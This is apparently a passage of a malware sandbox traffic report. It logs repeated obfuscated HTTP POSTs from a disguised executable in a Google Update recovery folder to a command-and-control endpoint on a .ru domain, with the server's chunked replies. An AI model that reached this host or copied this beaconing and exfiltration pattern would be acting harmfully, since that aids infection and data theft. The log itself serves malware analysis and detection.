                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  63 | 192.168.2.6 | 62699 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:00.848855019 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:01.205779076 CET | 1124 | OUT | Data Raw: 56 53 5f 52 54 5e 54 51 58 56 52 59 56 51 59 50 5b 5a 54 5b 55 58 50 5f 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VS_RT^TQXVRYVQYP[ZT[UXP_Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$%7=^'>8,:9R <[<'><] "(*(>&<;:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:01.293412924 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:01.559045076 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:01 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hz7A8y3zHgQK9SdxhsfAa8POVpePiaLI2EqW2yxus7b65JzfiW9FHnZuxwjHOYP%2BPGNHmvHEaPimNCMc06NKeCmyiSo0%2FOnav67I4GM4BF8johjBrcQhYR26TDlpDc2aLBktbXyw"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364c8ca288cc5-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2565&min_rtt=2016&rtt_var=1854&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=227733&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  64 | 192.168.2.6 | 62700 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:01.692192078 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:02.056293964 CET | 1124 | OUT | Data Raw: 56 57 5a 57 51 5d 51 57 58 56 52 59 56 5e 59 51 5b 59 54 5b 55 59 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VWZWQ]QWXVRYV^YQ[YT[UYPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$<!X",%Y'</:!=+:#*>$X#"3+%B17T9&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:02.169117928 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  65 | 192.168.2.6 | 62701 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:02.194813967 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:02.547841072 CET | 1964 | OUT | Data Raw: 56 53 5f 5c 54 5a 54 51 58 56 52 59 56 5c 59 5e 5b 58 54 51 55 5d 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VS_\TZTQXVRYV\Y^[XTQU]PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-0)7/9X37,\2 ?+#V).<4"4(D1'9*&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:03:02.667963982 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:02.942850113 CET | 956 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:02 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YIcm62mtuUESCCkEKoCdweMgQWgRH4y8c95ekaBnVA6%2FcrIcf2OJ2A1Aj5S1cqrnkL0U2tgPEtC7pymeCgsRyJ2i26Cu9SCFEAXBRpHaqn%2B2gzRT5ea%2BwM%2Bn9uq3eXYJ4ue9ay7B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364d15f41c343-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7985&min_rtt=1681&rtt_var=13239&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=28014&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 1d 29 3e 31 0c 24 32 20 5d 3c 13 0d 56 25 07 3d 02 28 01 3a 5d 33 07 30 02 2a 00 2b 10 36 3f 21 5a 31 06 24 58 21 3e 2f 5f 33 0e 2b 59 05 1c 20 44 36 2c 37 03 3d 03 09 5d 31 11 35 5c 33 2e 24 15 3c 01 23 0c 23 2b 2f 58 33 3d 3b 01 2a 5c 34 1d 24 3f 3f 5f 2d 2f 32 0e 33 2a 2c 54 00 11 26 1c 27 1f 30 16 20 37 02 12 21 1f 14 03 32 1a 3e 15 25 2c 3b 1b 37 00 2d 00 26 22 09 59 21 1d 03 06 32 28 25 13 34 3d 3f 54 3e 14 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%)>1$2 ]<V%=(:]30*+6?!Z1$X!>/_3+Y D6,7=]15\3.$<##+/X3=;*\4$??_-/23*,T&'0 7!2>%,;7-&"Y!2(%4=?T>%S -H?WS0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  66 | 192.168.2.6 | 62702 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:02.315737009 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:02.672863960 CET | 1124 | OUT | Data Raw: 56 5f 5f 5c 54 5c 54 55 58 56 52 59 56 5f 59 54 5b 59 54 59 55 54 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: V__\T\TUXVRYV_YT[YTYUTP[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-&<&7:'- ;): X**$>/##+(9&<.*&Y.,Y-9
                                                                                                                  Jan 1, 2025 16:03:02.780877113 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:02.985894918 CET | 798 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:02 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LbXGP3K9Ia0kJ2qY6S6b9XhxKoV5Aj0WKUy8fhZWkUJxf8YAo3kwAqpN0lHXCWA4n1gV4YLWH0KAzePX0A3km6CgeyzLZrH3d0GmcIKHOW2cfiPhXKfY5yZO48U404s8d1QkYwXk"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364d2180d4291-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3435&min_rtt=1639&rtt_var=4207&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=91187&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  67 | 192.168.2.6 | 62703 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:03.113523006 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:03.470048904 CET | 1124 | OUT | Data Raw: 53 55 5f 54 54 59 54 5c 58 56 52 59 56 5d 59 56 5b 52 54 59 55 5d 50 5d 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SU_TTYT\XVRYV]YV[RTYU]P]Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-0?-#&$X?E/:-U!=8X+9*=7#!<(+:%W,:&Y.,Y-1
                                                                                                                  Jan 1, 2025 16:03:03.617702961 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:03.869923115 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:03 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WqtAk%2FFAf6H0KG2dk%2FJH0XEb0%2FNAXtniSIKXdTvlqlZT9zqMCyzDQblMCSYaIdL7JZRbW5mY3tGm7OELqpcfk%2Fj7q6ucf1AyEgqSXlMa1BvrNCwscY5IO09Xc04%2BKdD5oGMCUi%2BF"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364d749180f81-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4703&min_rtt=3499&rtt_var=2172&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=417262&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a
                                                                                                                  Data Ascii: 42W\X
                                                                                                                  Jan 1, 2025 16:03:03.958408117 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  68 | 192.168.2.6 | 62704 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:04.082139969 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:04.536664963 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:04.716706991 CET | 1124 | OUT | Data Raw: 53 53 5a 56 54 50 54 55 58 56 52 59 56 5e 59 55 5b 5b 54 5f 55 5e 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SSZVTPTUXVRYV^YU[[T_U^PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.3<!\ *0=;;)=U4=$(+).[#17(+"&Y'R.*&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:05.068434954 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:05 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9CIjXfAmJkNfh73YgDHoUxetAB0YXn9VDs0wcF06SMdZ0PPC2gT1lNThd5NBf3e%2BOIDDC%2BVyi5Qs1NYTUanYlk6X9%2Fkf61X%2FgsecXLvVQD7gAbMcf4srQXDGJQvgnB%2ByLA1Czb0L"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364dd0cef8ca1-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5095&min_rtt=2417&rtt_var=6263&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=61233&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  69 | 192.168.2.6 | 62705 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:05.191215992 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:05.547817945 CET | 1124 | OUT | Data Raw: 53 53 5f 50 54 5d 54 5c 58 56 52 59 56 51 59 57 5b 59 54 59 55 58 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SS_PT]T\XVRYVQYW[YTYUXP^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.['!7-3'/)T40Z<>#/X<5D2:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:05.655436039 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:05.910667896 CET | 800 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:05 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M6AVg45NfB67Y57TpSPWHwrtzdTEwqt2QeviEWlipY06GPJ53XjBcoIZbBUkMMmfeJd8xYZ9T3DOlERvTKUwbIIIV0ji9YZGTLtHhtZXC6%2FfmPugctA5QQAZS8FDRt27XJRkAtFw"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364e409044201-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3732&min_rtt=1963&rtt_var=4274&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=90593&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  70 | 192.168.2.6 | 62706 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:06.043085098 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:06.391849995 CET | 1124 | OUT | Data Raw: 53 57 5f 5d 51 5d 51 55 58 56 52 59 56 5b 59 51 5b 5a 54 5d 55 5f 50 54 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SW_]Q]QUXVRYV[YQ[ZT]U_PTZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$: 20>?A/. [ ?*#V*>7Z<!1?,:&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:03:06.487298012 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:06.667912006 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:06 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gq0oWyWJEIXKh%2F4%2BRTpq1DSrPV9Nb6NnS4DRn5aVoMybY9vnPixoabDt1OrTGwfaf1tblIbPoASfgpCPWHQ60DYb6J44yuTA3d%2Bsfug97rs%2BM0RFnJATYyEjYmkkOISK64fxSdua"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364e948f94233-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5517&min_rtt=2486&rtt_var=6995&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=54599&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  71 | 192.168.2.6 | 62707 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:06.801279068 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:07.245246887 CET | 1124 | OUT | Data Raw: 53 53 5f 54 51 58 51 56 58 56 52 59 56 50 59 53 5b 53 54 5c 55 55 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SS_TQXQVXVRYVPYS[ST\UUP\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$/-4?1'=+,:27=[+)7R*.[ 2*+*&Y$.:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:07.272711039 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:07.513871908 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:07 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hvou8QjLgg3HbykTRWnT6sObBOh3pzDsiLYF6OAoyCe1Pjf%2FW4abf8Gv%2BP7crtP8zz%2FyNtCRUqMGrrCmLDIubn5SsyEcbnHfGPBIdBmsbJOf24NQyVYn%2BXfmmUM7xItw1xhZ8WQ2"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364ee299e199d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4869&min_rtt=1890&rtt_var=6667&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=56756&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
